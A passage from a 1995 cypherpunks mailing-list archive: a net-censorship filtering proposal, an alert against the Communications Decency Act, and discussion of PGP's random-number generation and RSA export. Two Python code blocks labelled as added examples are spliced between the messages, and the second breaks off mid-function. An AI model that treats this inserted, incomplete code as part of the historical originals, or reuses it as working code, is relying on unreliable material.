attractors in this problem.  I believe that Prodigy and SurfWatch
amount to first iterations, and that the market will push them towards
NYET.  When it does so move, and a majority of ISPs provide or nearly
provide NYET service, and ONLY then, the government might mandate the
NYET standard.  As a somewhat earlier measure, the government could
offer to hold harmless ISPs that adhere to these standards--but only
when the market has already handled the technical hurdles.
 
I feel it necessary to reiterate the importance of the government
waiting for a market solution to this problem.  By its design, the net
appeals to libertarians and anarchists.  For many years, it has been
accessible almost exclusively by people demographically predisposed to
a libertarian or anarchist world view.  The net.gods, when angered,
can produce no end of mischief.  And since they designed the system,
they won't be stoppable.  
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMB73X34gWvtXVTwZAQFKsAP9E/NOfKrt7WwcvNdMlWzg8jneyVa19hL+
9Ot7Ir4SigZJDDQ7hjxS2elJourCZpFWpBXFdKMbTGqTXMtmELZJu5qYidXDmV1i
BAWHYI0RW2E6MszGSgAh1MDfUpY7/RO89CjsuP8M3aGVF44FOWpIoTRZnNhXRO9q
xnA2tErpz+A=
=NpaG
-----END PGP SIGNATURE-----
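
Added example, not part of the original proposal: a small audit of the file layout the message describes, checking that the root-owned correspondence file and each parent-owned configuration file are locked to owner-only read/write. The mapping format (`minor_uid:parent_uid:config_path`, one entry per line) and all function names are assumptions made for this sketch; the proposal does not specify them.

```python
"""Audit owner-only locking of NYET-style mapping and configuration files."""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    path: str
    problem: str


def check_locked(path, owner_uid):
    """Return findings for a file that must be mode 0600 and owned by owner_uid."""
    try:
        st = os.lstat(path)  # lstat, so a symlink is reported rather than followed
    except FileNotFoundError:
        return [Finding(path, "missing")]
    if not stat.S_ISREG(st.st_mode):
        return [Finding(path, "not a regular file")]
    findings = []
    if st.st_uid != owner_uid:
        findings.append(Finding(path, "owned by uid %d, expected %d" % (st.st_uid, owner_uid)))
    mode = stat.S_IMODE(st.st_mode)
    if mode & 0o077:
        findings.append(Finding(path, "mode %04o grants group/other access" % mode))
    # An owner-only file can still be swapped out by anyone allowed to write
    # to the directory that holds it, so the directory is checked as well.
    parent_dir = os.path.dirname(os.path.abspath(path))
    if stat.S_IMODE(os.stat(parent_dir).st_mode) & 0o022:
        findings.append(Finding(parent_dir, "directory is group/other-writable"))
    return findings


def audit(mapping_path, mapping_owner_uid=0):
    """Check the mapping file, then every configuration file it points to.

    mapping_owner_uid defaults to 0 (root), as in the proposal; it is a
    parameter so the audit can be exercised without root privileges.
    """
    findings = check_locked(mapping_path, mapping_owner_uid)
    if os.path.islink(mapping_path) or not os.path.isfile(mapping_path):
        return findings
    with open(mapping_path) as fh:
        for lineno, line in enumerate(fh, 1):
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            try:
                minor, parent, config = line.split(":", 2)
                minor_uid, parent_uid = int(minor), int(parent)
            except ValueError:
                findings.append(Finding(mapping_path, "line %d: malformed entry" % lineno))
                continue
            if minor_uid == parent_uid:
                findings.append(
                    Finding(mapping_path, "line %d: minor and parent share an account" % lineno))
            # The configuration must belong to the parent, never to the minor.
            findings.extend(check_locked(config, parent_uid))
    return findings


if __name__ == "__main__":
    import sys
    for f in audit(sys.argv[1] if len(sys.argv) > 1 else "/etc/nyet.map"):
        print("%s: %s" % (f.path, f.problem))
```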





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanami.sbi.com>
Date: Tue, 1 Aug 95 17:38:03 PDT
To: cypherpunks@toad.com
Subject: who cypherpunks
Message-ID: <Pine.SOL.3.91.950802093715.3396D-100000@izanami>
MIME-Version: 1.0
Content-Type: text/plain



... oops. sorry folks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rhoz@sna.com (Rhonda Halushka) (by way of carolann@censored.org (UnCensored Girls Anonymous))
Date: Wed, 2 Aug 95 07:49:55 PDT
To: cypherpunks@toad.com
Subject: Net Censorship bill
Message-ID: <199508021449.HAA17139@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


This showed up on The Spiderwoman list.
Seems accurate.
I endorse it as much as I endorse PGP.
I know most of you filter me out,
but for those that don't, THEN
please read this just for me.

For if this tiny amendment fails,
I do predict there won't be any
discussions of PGP by about 2005.
Simply because PGP will be outlawed by then.

The wheels of Washington grind slowly.
But once started almost never stop.

Love Always,

Carol Anne


---- Begin Forwarded Message
Return-Path: <owner-policy-posts@cdt.org>
Received: from cdt.org by ix4.ix.netcom.com (8.6.12/SMI-4.1/Netcom)
	id UAA27278; Tue, 1 Aug 1995 20:05:43 -0700
Received: (from majordom@localhost) by cdt.org (8.6.9/8.6.9) id QAA30972
	for policy-posts-outgoing; Tue, 1 Aug 1995 16:37:15 -0400
Received: from [204.157.127.4] (whale.ctd.org [204.157.127.4]) by cdt.org
	(8.6.9/8.6.9) with SMTP id QAA30921 for <policy-posts>;
	Tue, 1 Aug 1995 16:34:55 -0400
Message-Id: <199508012034.QAA30921@cdt.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 1 Aug 1995 17:43:34 -0400
To: policy-posts@cdt.org
From: editor@cdt.org
Subject: ALERT: House to Vote This Week on Net-Censorship Bills
Sender: owner-policy-posts@cdt.org
Precedence: bulk


HOUSE TO VOTE THIS WEEK
-----------------------

The House of Representatives will vote late Thursday or early Friday
(Aug 3 or 4) on whether to add the Cox/Wyden Internet Freedom and Family
Empowerment Act as an amendment to the House Telecommunications Reform
Bill (HR 1555).

The Cox/Wyden amendment is a direct attack on the Exon/Coats Communications
Decency Act (CDA). House passage of the Cox/Wyden amendment is the last
chance we have to defeat the Exon/Coats CDA. If the House fails to pass
Cox/Wyden, the Exon bill will likely become law.

We must act now to head off this possibility. Please take a moment to
contact your member of Congress and urge them to support the Cox/Wyden
legislation (described in the alert below). 

The attached alert is from a coalition organized by the Voters
Telecommunications Watch (VTW) which includes CDT, EFF, EPIC, and other
online advocacy organizations.

This may be your last chance to make your voice heard on this critical 
issue, so please call before Friday August 4.

========================================================================

       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
        (SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

        Update: -Latest News:
                        House vows to vote on Telecomm bill (which
                        includes the CDA) this week before recess!
                -What You Can Do Now

       ***   THIS IS YOUR LAST CHANCE TO MAKE A DIFFERENCE.      ***
       ***   THE HOUSE WILL VOTE ON THE COMMUNICATIONS DECENCY   ***
       ***   ACT THIS WEEK.  IF WE LOSE, IT WILL BECOME LAW.     ***

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
                             July 30, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
                 REDISTRIBUTE ONLY UNTIL August 14, 1995
             REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

      Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
________________________________________________________________________

CONTENTS
        The Latest News
        What You Can Do Now
        What is Cox/Wyden? (HR1978)
        Chronology of the CDA
        For More Information
        List Of Participating Organizations
        List of the House of Representatives

________________________________________________________________________

THE LATEST NEWS

This week the House of Representatives will choose between
ANTI-FREE-MARKET PRO-CENSORSHIP LEGISLATION (the Exon/Coats
Communications Decency Act) and ANTI-CENSORSHIP PRO-PARENTAL-CONTROL
LEGISLATION (the Cox/Wyden Internet Freedom and Family Empowerment Act
- HR1978).

THIS IS YOUR LAST CHANCE AS A CITIZEN TO MAKE A DIFFERENCE.  IF WE LOSE
THIS VOTE, THE COMMUNICATIONS DECENCY ACT, ALREADY PASSED BY THE SENATE,
WILL BECOME US LAW.

The vision of a cyberspace ONLY FIT FOR CHILDREN will become reality.

The Communications Decency Act will be offered by supporters of
conservative pro-censorship groups THIS WEEK.  They will try and amend
HR1555 to include the Communications Decency Act and remove any other
net-friendly language such as the Leahy/Klink study.

________________________________________________________________________

WHAT YOU CAN DO NOW

1. THERE'S NO TIME FOR EMAIL OR SNAIL MAIL.  CALL OR FAX YOUR
   REPRESENTATIVE NOW.

2. Find your rep (instructions below) and urge them to oppose the
   Communications Decency Act and support parental control legislation
   (the Cox/Wyden "Internet Freedom and Family Empowerment Act" HR1978)

   Figure out who your Rep is; feel free to use the following sample.
   
** See Instructions Below On How To Obtain Your Rep's Phone and Fax Number **

   SAMPLE PHONE CALL
    (Y=You, S=Rep's Staffer)    
        <ring ring>
        S:Rep. Snark's office, may I help you?

        Y:Hi, As your constituent I'd like to urge Rep Snark to
          oppose Internet censorship legislation such as the Exon/Coats
          Communications Decency Act and support parental control bills
          such as the Cox/Wyden Internet Freedom and Family Empowerment
          Act - HR1978.

        S:Anything else?
        Y:Yes, where does Rep. Snark stand on this issue?
        S:Rep. Snark supports HR1978.
        Y:Thank you!

   Take the response you get and mail it to vtw@vtw.org.  We'll be
   totalling up the responses and counting votes.  Send it to us
   with the subject line of "house call".

        $ Mail vtw@vtw.org
        Subject: house call
        I live in Ohio and I called Rep Snark.  Snark's staffer
        said he favors HR1978 too!
        .
        Mail sent...
        $

   SAMPLE FAX 
        Dear Representative Snark,

        As your constituent I'd like to urge Rep Snark to oppose
        Internet censorship legislation such as the Exon/Coats
        Communications Decency Act and support parental control bills
        such as the Cox/Wyden Internet Freedom and Family Empowerment
        Act - HR1978.

        Sincerely,
        
        <your address>
        
3. Ask your Internet Service Provider or Sysop to put the following
   message into their "message of the day".  We also encourage you
   to forward the following short announcement to relevant mailing
   lists where a copy of this alert would be too long for the list.

        8/1/95: The Communications Decency Act (CDA) will be voted on
        by the House of Representatives this week.  IT IS CRUCIAL THAT
        YOU CALL YOUR REPRESENTATIVE NOW.  To get a copy of the alert,
        send mail to vtw@vtw.org with "send alert" in the subject line,
        gopher -p 1/vtw/exon/alert gopher.panix.com, or
        URL:gopher://gopher.panix.com:70/00/vtw/exon/alert

4. Forward a copy of this alert to your friends until the "freshness
   date" above.  THIS IS CRUCIAL.  WE NEED TO GENERATE CALLS OF SUPPORT
   OR THE COMMUNICATIONS DECENCY ACT WILL BECOME LAW.

5. Congratulate yourself!  You've done your part to save cyberspace.

________________________________________________________________________

HOW TO FIND YOUR REPRESENTATIVE'S PHONE AND FAX NUMBER:

1. If you don't remember your representative's phone number, send email to

     reps@cdt.org

   You will automatically receive a list of all 435 members of the House of
   Representatives with phone and fax numbers.

2. OR, call the Capitol Switchboard (+1.202.225.3121) and ask to be
   connected to your Rep's office. If you don't remember who
   your Rep. is, the operator can tell you when provided with your zipcode.

________________________________________________________________________

WHAT IS COX/WYDEN?

Cox/Wyden (HR1978) is legislation intended to prevent the Federal
Communications Commission (FCC) from imposing content regulations on
cyberspace and encourage private sector development and deployment of
parental control technologies.

Throughout HR1978's history, civil liberties advocates from ACLU, CDT,
EPIC & PFAW have examined the bill and recommended modifications to
ensure that the bill does not negatively impact your privacy or civil
liberties.  Although several questions still remain, Representatives
Cox and Wyden are committed to addressing these concerns.  As the
legislation moves to the House/Senate conference committee, civil
liberties advocates will continue to submit changes to the
Representatives' staffers throughout the conference process where the
House bill and the Senate-approved Communications Decency Act are
reconciled.

________________________________________________________________________

CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

House vote to occur before Friday August 4, 1995.

Jun 30, '95     Cox and Wyden introduce the "Internet Freedom and Family
                Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________

FOR MORE INFORMATION

Web Sites
        URL:http://www.panix.com/vtw/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
        URL:http://outpost.callnet.com/outpost.html

FTP Archives
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
                alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________

LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Communication Association * American Council for the Arts *
Arts & Technology Society * Association of Alternative Newsweeklies *
biancaTroll productions * Californians Against Censorship Together *
Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet * Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Human
Rights Watch * Inland Book Company * Inner Circle Technologies, Inc. *
Inst. for Global Communications * Internet On-Ramp, Inc. * Internet
Users Consortium * Joint Artists' and Music Promotions Political Action
Committee * The Libertarian Party * Marijuana Policy Project *
Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party *
National Bicycle Greenway * National Campaign for Freedom of Expression
* National Coalition Against Censorship * National Gay and Lesbian Task
Force * National Public Telecomputing Network * National Writers Union
* Oregon Coast RISC * Panix Public Access Internet * People for the
American Way * Republican Liberty Caucus * Rock Out Censorship *
Society for Electronic Access * The Thing International BBS Network *
The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)
________________________________________________________________________

        End Alert
=======================================================================












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 2 Aug 95 06:51:48 PDT
To: cypherpunks@toad.com
Subject: HEY_now
Message-ID: <199508021351.JAA08303@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-02-95. NYPaper:


   "Pattern Emerges In Bomber's Tract: F.B.I. Says Attacker
   Stayed Close to a Few Campuses."

      In what was described as an important advance in the
      hunt for an elusive serial bomber, the Federal Bureau of
      Investigation said yesterday that it had traced a
      years-long pattern of academic involvement that took the
      self-described anarchist from the Chicago area to Salt
      Lake City to Berkeley, Calif. By matching his 17-year
      record of carnage against an analysis of a densely
      argued 35,000-word tract he sent to The New York Times
      in June, Government officials say they have concluded
      that the bomber is a student of the history of science
      who may have taken classes at or hovered around major
      university campuses from the late 1970's to the mid-
      1980's.                                        FCU_stu


   "Excerpts From Manuscript Linked to Suspect in 17-Year
   Series of Bombings."

      Role of Scientists: The system HAS TO force people to
      behave in ways that are increasingly remote from the
      natural pattern of human behavior. For example, the
      system needs scientists, mathematicians and engineers.
      It can't function without them. So heavy pressure is put
      on children to excel in these fields.          FCX_txt



   Twofer: HEY_now











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 2 Aug 95 07:13:01 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Consumer Report: RSA T-Shirt
Message-ID: <199508021411.KAA05924@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


I got my RSA tee-shirt the other day..

It came promptly and both of the shirts I ordered came. It
was oddly shipped in a near see-through pouch.

I'm happy overall with the shirt, the quality of the printing, and
the construction of the Tee (all cotton, name brand tee)..

I have only one complaint. That is the "machine readable" rsa barcodes.

To my eye the printing job there is rather poor. I doubt it is
machine readable (although I don't have a 128 barcode reader to
try it out with)..

I'm disappointed as I doubt that the 4 line RSA code is NOT exportable
since text books have been allowed previously to be exported. Machine
readable materials have been called into question. My thoughts are
that if it is not machine readable the shirt is much more a novelty
than a munition (which is sorta why I bought it to begin with.. to be
fair..)..

Of course I hoped to be the first one on my block to own one. But when
I went into the drug store the clerk asked me where I got it, noting
someone else was just in there wearing one...

/hawk
-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 2 Aug 95 07:43:08 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Provably Correct Crypto
Message-ID: <9508021442.AA25910@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Those interested in this discussion of verification of PGP etc. might also
find it worth reading some recent traffic on the firewalls list, regarding
the viability of "trusted systems" and formal evaluation methods. Look for
messages from Marcus Ranum (ex-TIS), Ray Kaplan, and some others in the
past few digests (e.g. #458 and #459, and a few prior ones). You can find them
in ftp://ftp.greatcircle.com/pub/firewalls/digest/ with filenames like
v04.n458.Z, v04.n459.Z, etc. (Only digests through #457 are there now, but I'm
sure the latter ones will appear soon.) Use majordomo@greatcircle.com if you
want to subscribe to firewalls or firewalls-digest.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Tue, 1 Aug 95 19:53:49 PDT
To: Richard Martin <rmartin@alias.com>
Subject: Re: Stopped at the boarder
In-Reply-To: <9508011001.ZM17072@glacius.alias.com>
Message-ID: <Pine.LNX.3.91.950802104951.15600B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Richard Martin wrote:

> Until a few years ago, carrying software across the border from the states
> to Canada, one would only pay duty on the value of the media. Canadian
> Customs regulations did not recognise any value in the information
> contained on the floppies. I haven't actively exported/imported software
> in this manner recently (well, I carried 2.6ui to Mobile and back without
> realising it (or, indeed, ever putting it in a drive) and so broke ITAR)
> so I'm not sure how things stand currently.
> 
> I think they might actually have been convinced of the value of software.
> [Department of External Affairs and International Trade has been, as noted
> earlier. Danger of software, at least.]


As far as I know, under current GATT regulations software is not
considered a commodity, and therefore its import does not attract customs
duties. However, I'm not sure about the actual behaviour of the US
customs; from recent cases I can confirm that in the European Union and
South Africa that rule is respected. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Tue, 1 Aug 95 15:59:57 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <9508011911.AA11465@all.net>
Message-ID: <199508012259.KAA16027@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am Dr. Frederick B. Cohen and I say ...

[ lots of purely subjective arguments that frequent alt.security.pgp ]

Frederick can you please tell me why I should believe thttpd is secure.
I don't accept the ability to compile it myself as evidence and I
don't accept a summary of that source written in English prose on the
basis that it has no hard link whatsoever to the source.  It was
also written by the authors of thttpd.

You should find this argument hauntingly familiar.

You state that crypto should be proved correct and suggest a technique
otherwise known as formal specification.  I agree, pgp should have
been written in Z-specs.  If you take a course in formal specification
you will soon see the intractability of the technique wrt large
systems.

I'm sorry, the English prose your team writes holds no extra formal
credibility over trust.  It demonstrates more study - but has not
proven security.

If you want people on this list to repeat after you "I cannot be
certain there are no compromising bugs or backdoors in X" Then I will
go out on a limb and say everyone here will agree if system X is
sufficiently large.

p.s X = thttpd

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 2 Aug 95 08:31:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: anonymity review in law journal
In-Reply-To: <199508020334.UAA09787@netcom15.netcom.com>
Message-ID: <9508021530.AA28462@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri writes:
> Hi everyone, someone tipped me off to a law review article by 
> Anne Branscomb entitled Anonymity, Autonomy, and Accountability: 
> Challenges to the First Amendment in Cyberspaces  104 Yale L F 1639.

I expect this is the Anne Wells Branscomb who reviewed the Rimm job for
the Georgetown Law Journal. According to
http://catalog.com/columbia/homepage/ftr/995.html, she `called the study's
methodology "academically rigorous."' She is a professor at the GWU law 
school. Alas, neither the GWU law school nor the Yale law school seems to
have any measurable presence on the WWW. A Lycos search turned up a footnote
pointing to an article she wrote for Scientific American:

Branscomb, A. W.: Common law for the electronic frontier.
   In Scientific American, September 1991, pp. 154-158. 

A paper by Norderhaug and Oberding on "Designing a Web of Intellectual
Property" at http://www.ifi.uio.no/~terjen/pub/webip/950220.html that
cites the SciAm piece mentions that:

	Branscomb [bra91] reminds us that the rigors of the market
	economy are such that it is not a viable economic policy to give
	away the results of intellectual labor without a fair and equitable
	compensation. 

Thus I would be rather surprised if the anonymity/autonomy/accountability
paper turned out to be notably sympathetic to anonymity. That would make it
all the more interesting to see....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Wed, 2 Aug 95 03:36:56 PDT
To: fc@all.net (Fred Cohen)
Subject: some discussion of rannos in PGP (was: of a hole in PGP)
Message-ID: <17441.199508021035@olib>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Fred Cohen <fc@all.net> writes on cpunks:
: PGP is a product that is specifically disliked by the powers that be
: because it provides free access to strong cryptography which is against
: the public policy of the US government.  That means that people in that
: same said government likely feel it is their duty to make certain that
: they can still read PGP mail.

Certainly granted!  Hence persecution of Phil Z.

A bit difficult to achieve in the presence of available source code, I
(and many others) are using PGP compiled by themselves.  That doesn't
prove there are no subtle back-doors but it rules out unsophisticated
backdoors in distributed executables.  (Even such things could be
checked if someone got suspicious, things can be reverse engineered).

Now to the question of what can be done practically to help further
validate PGP's authenticity, and freeness from back-doors.

The way I see it the only attack which you could reasonably expect to
pull off in terms of being subtle enough to hope to get away with
given full access to source is the random number generator.

The code which actually generates the random primes, and converts them
to PGP output format is reasonably short and well defined.  Wouldn't
take long to single step that and watch that nothing happened on the
way out to file.

Encryption is a similarly simple operation, M ^ e % n you could easily
check that manually (with a certain small piece of perl even).  Same
for generation of IDEA keys.

I don't really feel qualified to comment properly on the random number
generation, but to me (I looked at the source in fair detail) it looks
good.

I mean there is real entropy being generated (timing key strokes
against a high speed clock on PCs lower on UNIX systems typically)
and the stirring operation looks good, MD5 + XOR on key.

Presuming that the MD5 implementation is correct?  Seems a pretty good
likelihood to be, it's been given enough real world tests that you
could do a very nice probabilistic statistical confidence test on it.
Which would easily say that it was correct to some huge degree of
certainty.

The legitimacy of using a high frequency clock to time intervals
between key strokes, seems a very good way of generating random
numbers.  I mean there is most definitely *some* entropy being
generated, PGP makes reasonably conservative estimates of the amount
of entropy generated, and stirs the whole number in (not just the
expected entropy).

I'm not saying your comments aren't useful; they are, and analysis and
critique of the random number generation in particular is very
important.  Indeed given the sheer cost of factoring a 2048 bit RSA
modulus, or of brute forcing a 128bit IDEA key, it is indeed a
pertinent question as to whether any kind of brute force attack could
be generated on the random number generation, which could be slightly
cheaper than either of these.  128bits is a lot to play with.

To me it looks good, but then I'm not a cryptographer, and also there
is the kind of "NP problem aspect" to it all in that for reasonably
complex code it will not be apparent whether a proof is possible
without looking at the specifics.

Still I think some analysis of the random number generation code would
be useful work.  I'm not expecting to see a flaw, but doesn't mean it
shouldn't be entered into with an open mind.

I think it does not fall in the same league as the apparent difficulty
of having a secure sendmail (you said a compromising couple of bugs
seem to get found a couple of times a year), for at least two reasons,
one is that with sendmail the code being examined must take input from
Charlie who is trying to mess the system up.  So a deliberate attempt
to foul the works, examining the source, looking for any kind of
subtle weakness, or weird combination of inputs (which would almost
certainly never occur by accident during normal usage) which could
cause it to compromise security.  For PGP for the section we are
talking about (key generation) the only input comes from *you*, the
person who is presumably trying to obtain security, not trying to
generate a weak key through some tortuous input string.  So things
like the stack over flow with carefully crafted machine code for the
particular architecture which was exploited with finger in the fave
old example of the worm of yore, is not the kind of attack you need to
be worried about (IMO).

The second aspect in which analysing PGP's ran no generation, is
different to sendmail or http type problems is that what PGP is doing
with its random no generation is well defined, contained in few
lines of code, and only really relying on a couple of assertions:

	1) MD5 is itself not inherently flawed
	2) the MD5 implementation is correct
	3) key stroke timings are a source of a safely conservatively
	   estimatable amount of entropy
	4) the key generation method does not narrow the search space
	5) there are no other compromising bugs between key generation
	   of the key and it being written to the keyring

1) Heh, not a lot you can do about that.  Is it or isn't it?  Time
will tell.

2) Seems pretty likely to me there are test strings which come with
the RFC implementation, and it would be unbelievably unlikely that it
should produce the complete set of tests and yet somehow still be
flawed.  Given that there are _no_ branches in the algorithm (ie just
various permutations and bit twiddlings based on the key info, which
get mangled into the digest).

3) Pretty good I think, especially on a PC, which has a higher speed
timer.  Some entropy is surely generated, and with safe entropy
estimation, and cryptographically secure stirring, it sounds pretty
good to me.

4) For RSA keys, I don't think so, unless you believe that strong
primes will again become important.  For current factoring algorithms
strong primes are just as hard to factor as a completely randomly
generated prime, except for certain primes which are in any have an
infinitesimal chance of occurring.  For IDEA keys there is little
value added over a straight ran no, as there are no special properties
which an IDEA key must have.

5) I would assert is relatively trivial to demonstrate, a couple of
hours with a debugger should demonstrate that.  You could do testing
more rigorously, test every branch, so that you have checked that the
outcome is that the key gets written to the keyfile, with various
options, not utterly fool proof of course, but pretty darn good given
the simplicity.

On the more philosophical side, with the idea that you can never be
sure that folks aren't NSA agents with hidden agendas etc, well you
can't be sure.

But the open source and sheer number of folks reading is the best
argument against this.  That means that at least some true blue
cpunks, "live free or die" types will read it in earnest, and examine
very carefully.

Another philosophical argument against PGP having any cleverly hidden
"back-doors" in the form of purposefully weakened ran-no generators or
what have you is that the NSA et al hate PGP with such vehemence.
Heh if they don't like it, it must be good :-)

And remember, say NO to key escrow :-)

(It's no good having an ultra carefully validated PGP if you go to
jail for being caught with a copy on your HD, welcome to the Land of
the Freeh, and all you know.  May happen sooner than expected, then
the only folks using crypto will be the "live free or die" folks, plus
of course the criminals who figure they have more to hide and would
get in more trouble for what they are really up to than for a
"possession of crypto" charge.)

Adam

PS to any folks who may have sent me mail in the last couple of days,
note the temporary change of email addr to: A.Back@ex.ac.uk due to
local hw failure, similarly the same m/c was the WWW server, should
all return to normal in a couple of days.  (Talk about single point of
failure, all the X-terms booted off it too).

- --
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
- --rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
- -------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----
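
Added example, not part of Adam Back's message or of the PGP sources: the
two known-answer checks the message describes, an MD5 run against the
RFC 1321 test suite and a hand-written M^e mod n compared with an
independent implementation. It assumes Python's hashlib MD5 as the
implementation under test and uses the toy key from the "TRY:" line; the
sample messages are constructed.

```python
"""Known-answer checks in the spirit of the message above (added example)."""
import hashlib
from math import gcd

# RFC 1321 appendix A.5 test suite (subset): input -> expected MD5 hex digest.
RFC1321_VECTORS = {
    b"": "d41d8cd98f00b204e9800998ecf8427e",
    b"a": "0cc175b9c0f1b6a831c399e269772661",
    b"abc": "900150983cd24fb0d6963f7d28e17f72",
    b"message digest": "f96b697d7cb7938d525a2f31aaf161d0",
    b"abcdefghijklmnopqrstuvwxyz": "c3fcd3d76192e4007dfb496cca67e13b",
}


def md5_hex(data):
    """MD5 implementation under test (assumption: the standard library's)."""
    return hashlib.md5(data).hexdigest()


def md5_known_answer_failures(md5=md5_hex):
    """Return the test inputs for which `md5` disagrees with RFC 1321."""
    return [msg for msg, want in RFC1321_VECTORS.items() if md5(msg) != want]


def modexp(base, exponent, modulus):
    """Right-to-left square-and-multiply, written out so it can be stepped."""
    if modulus < 1 or exponent < 0:
        raise ValueError("need modulus >= 1 and exponent >= 0")
    result = 1 % modulus          # 0 when modulus == 1
    base %= modulus
    while exponent:
        if exponent & 1:          # this bit of the exponent is set
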